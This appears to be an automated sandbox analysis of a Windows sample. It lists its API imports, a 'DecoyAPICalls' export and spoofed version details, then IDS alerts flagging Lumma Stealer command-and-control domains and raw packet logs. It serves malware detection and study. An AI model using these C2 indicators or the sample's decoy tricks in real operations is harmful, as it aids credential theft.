USER32.dll | AdjustWindowRectEx, AdjustWindowRectExForDpi, AnimateWindow, AppendMenuW, BeginPaint, BringWindowToTop, CallNextHookEx, CallWindowProcW, CascadeWindows, CheckDlgButton, ChildWindowFromPoint, ClientToScreen, CloseClipboard, CloseGestureInfoHandle, CloseTouchInputHandle, CloseWindow, CreateCaret, CreateDialogParamW, CreateMenu, CreatePopupMenu, CreateWindowExW, DefWindowProcW, DestroyCaret, DestroyMenu, DestroyWindow, DialogBoxParamW, DispatchMessageW, DrawMenuBar, DrawTextW, EmptyClipboard, EndDialog, EndPaint, EnumDisplayMonitors, ExitWindowsEx, FillRect, FindWindowExW, FindWindowW, FlashWindow, FlashWindowEx, GetActiveWindow, GetAsyncKeyState, GetCapture, GetCaretPos, GetClassLongW, GetClientRect, GetClipboardData, GetCursor, GetDC, GetDesktopWindow, GetDlgItem, GetDlgItemTextW, GetDpiForWindow, GetFocus, GetForegroundWindow, GetGestureInfo, GetGuiResources, GetKeyState, GetKeyboardState, GetMenu, GetMessageW, GetMonitorInfoW, GetParent, GetSubMenu, GetSystemMetrics, GetTouchInputInfo, GetWindow, GetWindowDC, GetWindowLongW, GetWindowPlacement, GetWindowRect, GetWindowTextW, InsertMenuW, InvalidateRect, IsClipboardFormatAvailable, IsDlgButtonChecked, IsGUIThread, IsIconic, IsWindow, IsWindowVisible, IsZoomed, KillTimer, LoadAcceleratorsW, LoadCursorW, LoadIconW, LoadImageW, LoadMenuW, LoadStringW, LockWorkStation, MapVirtualKeyW, MessageBoxExW, MessageBoxIndirectW, MessageBoxW, MonitorFromWindow, OpenClipboard, OpenIcon, PeekMessageW, PostQuitMessage, RedrawWindow, RegisterClassExW, RegisterWindowMessageW, ReleaseCapture, ReleaseDC, RemoveMenu, ReplyMessage, ScreenToClient, SendMessageTimeoutW, SendNotifyMessageW, SetActiveWindow, SetCapture, SetCaretPos, SetClassLongW, SetClipboardData, SetCursor, SetDlgItemTextW, SetFocus, SetForegroundWindow, SetKeyboardState, SetMenu, SetParent, SetTimer, SetWindowLongW, SetWindowPlacement, SetWindowPos, SetWindowTextW, SetWindowsHookExW, ShowCursor, ShowWindow, ShowWindowAsync, SwitchToThisWindow, SystemParametersInfoW, TileWindows, TrackPopupMenu, TranslateMessage, UnhookWindowsHookEx, UnregisterClassW, UpdateWindow, ValidateRect, VkKeyScanW, WaitMessage, WinHelpW, WindowFromPoint, keybd_event, mouse_event, wsprintfW, wvsprintfW
KERNEL32.dll | AllocConsole, Beep, CancelIoEx, CloseHandle, CopyFileW, CreateDirectoryW, CreateEventW, CreateFileW, CreateMutexW, CreateProcessW, CreateSemaphoreW, CreateSymbolicLinkW, CreateThread, DebugBreak, DeleteCriticalSection, DeleteFileW, DeviceIoControl, EnterCriticalSection, ExitProcess, ExitThread, FindClose, FindFirstFileW, FindNextFileW, FlushFileBuffers, FormatMessageW, FreeConsole, FreeLibrary, GetCommandLineW, GetComputerNameW, GetConsoleMode, GetCurrentDirectoryW, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetDiskFreeSpaceW, GetDriveTypeW, GetEnvironmentVariableW, GetErrorMode, GetExitCodeProcess, GetFileAttributesW, GetFileInformationByHandle, GetFileSize, GetFileType, GetFullPathNameW, GetLastError, GetLogicalDriveStringsW, GetLongPathNameW, GetModuleFileNameW, GetModuleHandleExW, GetModuleHandleW, GetNativeSystemInfo, GetProcAddress, GetProcessAffinityMask, GetProcessDEPPolicy, GetProcessHeap, GetProcessId, GetProcessTimes, GetShortPathNameW, GetStartupInfoW, GetStdHandle, GetSystemDirectoryW, GetSystemInfo, GetSystemPowerStatus, GetSystemTime, GetSystemTimeAsFileTime, GetTempPathW, GetThreadContext, GetThreadId, GetThreadPriority, GetTickCount, GetTimeZoneInformation, GetUserDefaultLocaleName, GetVersion, GetVersionExW, GlobalMemoryStatusEx, HeapAlloc, HeapFree, HeapReAlloc, HeapSize, HeapValidate, InitializeCriticalSection, IsDebuggerPresent, LeaveCriticalSection, LoadLibraryW, LockFile, MoveFileW, OpenEventW, OutputDebugStringW, QueryDosDeviceW, QueryPerformanceCounter, ReadConsoleW, ReadFile, ReadFileEx, ReleaseMutex, RemoveDirectoryW, ResumeThread, SetConsoleMode, SetCurrentDirectoryW, SetEndOfFile, SetErrorMode, SetFileAttributesW, SetFilePointer, SetLastError, SetProcessAffinityMask, SetProcessDEPPolicy, SetStdHandle, SetThreadContext, 
SetThreadExecutionState, SetThreadPriority, SignalObjectAndWait, Sleep, SleepEx, SuspendThread, SwitchToThread, TerminateProcess, TerminateThread, TryEnterCriticalSection, UnlockFile, VirtualAlloc, VirtualFree, VirtualProtect, VirtualQuery, WTSGetActiveConsoleSessionId, WaitForMultipleObjects, WaitForSingleObject, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, WriteConsoleW, WriteFile, WriteFileEx, lstrcatW, lstrcmpiW, lstrcpyW, lstrlenW
                                                                                                                                                                            ADVAPI32.dllAccessCheck, AccessCheckByType, AccessCheckByTypeResultList, AddAccessAllowedAce, AddAccessDeniedAce, AdjustTokenPrivileges, AllocateAndInitializeSid, AllocateLocallyUniqueId, ChangeServiceConfigW, CheckTokenMembership, ControlService, CopySid, CryptAcquireContextW, CryptCreateHash, CryptDecrypt, CryptDeriveKey, CryptDestroyKey, CryptEncrypt, CryptExportKey, CryptGenKey, CryptHashData, CryptImportKey, CryptReleaseContext, CryptSignHashW, CryptVerifySignatureW, DecryptFileW, DeleteService, DeregisterEventSource, EncryptFileW, EnumDependentServicesW, EnumServicesStatusW, FileEncryptionStatusW, FreeSid, GetAce, GetAclInformation, GetLengthSid, GetSecurityDescriptorDacl, GetSidIdentifierAuthority, GetSidSubAuthority, GetSidSubAuthorityCount, GetTokenInformation, GetUserNameW, InitializeAcl, InitializeSecurityDescriptor, IsTextUnicode, IsValidAcl, LogonUserW, LookupAccountNameW, LookupAccountSidW, LookupPrivilegeValueW, MapGenericMask, NotifyServiceStatusChangeW, ObjectCloseAuditAlarmW, ObjectOpenAuditAlarmW, ObjectPrivilegeAuditAlarmW, OpenProcessToken, OpenSCManagerW, OpenServiceW, OpenThreadToken, PrivilegeCheck, PrivilegedServiceAuditAlarmW, QueryServiceConfigW, QueryServiceStatus, RegCloseKey, RegConnectRegistryW, RegCreateKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumKeyExW, RegEnumValueW, RegLoadAppKeyW, RegLoadKeyW, RegNotifyChangeKeyValue, RegOpenKeyExW, RegQueryValueExW, RegRestoreKeyW, RegSaveKeyExW, RegSaveKeyW, RegSetValueExW, RegUnLoadKeyW, RegisterEventSourceW, ReportEventW, SetAclInformation, SetSecurityDescriptorDacl, SetTokenInformation, StartServiceW
Name | Ordinal | Address
?DecoyAPICalls@@YAXXZ | 1 | 0x401000
Description | Data
CompanyName | Cost-effective System Ltd.
FileDescription | Tool to Evaluate Application efficiently
FileVersion | 2.15.193.5035
ProductName | CreateInfo
LegalCopyright | 2025 Cost-effective System Ltd.
InternalName | Nepomuk
Translation | 0x0409 0x04e4
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-04-12T09:26:24.734313+0200 | 2061393 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soursopsf .run) | 1 | 192.168.2.4 | 57934 | 1.1.1.1 | 53 | UDP
2025-04-12T09:26:24.859642+0200 | 2061395 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (changeaie .top) | 1 | 192.168.2.4 | 49666 | 1.1.1.1 | 53 | UDP
2025-04-12T09:26:25.294844+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49716 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:25.294844+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49716 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:27.084877+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49717 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:27.084877+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49717 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:28.341631+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49718 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:28.341631+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49718 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:29.570168+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49719 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:29.570168+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49719 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:31.652698+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49720 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:31.652698+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49720 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:33.229489+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49721 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:33.229489+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49721 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:36.799930+0200 | 2061396 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (changeaie .top in TLS SNI) | 1 | 192.168.2.4 | 49727 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:36.799930+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49727 | 104.21.42.7 | 443 | TCP
2025-04-12T09:26:37.754261+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49728 | 140.82.114.3 | 443 | TCP
2025-04-12T09:26:38.633161+0200 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.4 | 49729 | 185.199.111.133 | 443 | TCP
2025-04-12T09:26:39.185271+0200 | 2822537 | ETPRO EXPLOIT Possible Win32k Elevation of Privilege Vulnerability (CVE-2016-7191) | 1 | 185.199.111.133 | 443 | 192.168.2.4 | 49729 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                            Apr 12, 2025 09:26:28.343583107 CEST44349718104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:28.343914032 CEST44349718104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:28.345746994 CEST49718443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:28.345885992 CEST49718443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:28.345932007 CEST44349718104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.085882902 CEST44349718104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.086083889 CEST49718443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.346529961 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.346618891 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.346782923 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.347078085 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.347096920 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.569953918 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.570168018 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.571558952 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.571588993 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.571815014 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.572865963 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.572988987 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.573029995 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:29.575171947 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:29.575187922 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:30.247354031 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:30.247505903 CEST44349719104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:30.247627974 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:30.247740030 CEST49719443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.428165913 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.428216934 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:31.428319931 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.428999901 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.429038048 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:31.652566910 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:31.652698040 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.653691053 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.653719902 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:31.654069901 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:31.655297041 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.655374050 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:31.655430079 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:32.201407909 CEST44349720104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:32.201749086 CEST49720443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.002264977 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.002309084 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.002396107 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.002732992 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.002744913 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.229392052 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.229489088 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.230814934 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.230827093 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.231153011 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.232368946 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233076096 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233120918 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.233226061 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233268976 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.233380079 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233575106 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.233740091 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233777046 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.233943939 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.233983040 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234160900 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234215975 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234234095 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234262943 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234352112 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234390974 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234433889 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234455109 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234522104 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234554052 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234602928 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234622955 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234690905 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234726906 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234771013 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234793901 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:33.234821081 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:33.234834909 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.383522034 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.383810043 CEST44349721104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.384241104 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.384241104 CEST49721443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.572952986 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.573064089 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.573158979 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.573575974 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.573601007 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.799823999 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.799930096 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.801714897 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.801743031 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.802083015 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:36.814511061 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.814553976 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:36.814655066 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.388700008 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.388864040 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.389046907 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:37.389353037 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:37.389399052 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.389452934 CEST49727443192.168.2.4104.21.42.7
                                                                                                                                                                            Apr 12, 2025 09:26:37.389468908 CEST44349727104.21.42.7192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.500979900 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.501065016 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.501386881 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.501933098 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.501971006 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.754065037 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.754261017 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.758435965 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.758461952 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.758910894 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:37.760462046 CEST49728443192.168.2.4140.82.114.3
                                                                                                                                                                            Apr 12, 2025 09:26:37.804272890 CEST44349728140.82.114.3192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.397423029 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.397466898 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.397512913 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.397524118 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.397581100 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.397680044 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.402932882 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.402975082 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.403045893 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.403047085 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.403059959 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.403224945 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.408063889 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.408122063 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.408166885 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.408184052 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.408199072 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.408396006 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.413556099 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.413595915 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.413631916 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.413644075 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.413697004 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.413805008 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.418181896 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.418221951 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.418270111 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.418281078 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.418351889 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.418411016 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.422552109 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.422594070 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.422637939 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.422650099 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.422667027 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.422857046 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.426808119 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.426829100 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.426923037 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.426923037 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.426938057 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.427194118 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.430793047 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.430826902 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.430922031 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.430936098 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.431236982 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.434998035 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.435009956 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.435106993 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.435106993 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.435122967 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.435293913 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.439029932 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.439060926 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.439135075 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.439136028 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.439148903 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.439461946 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.442573071 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.442595959 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.442678928 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.442678928 CEST49729443192.168.2.4185.199.111.133
                                                                                                                                                                            Apr 12, 2025 09:26:39.442692041 CEST44349729185.199.111.133192.168.2.4
                                                                                                                                                                            Apr 12, 2025 09:26:39.442794085 CEST49729443192.168.2.4185.199.111.133
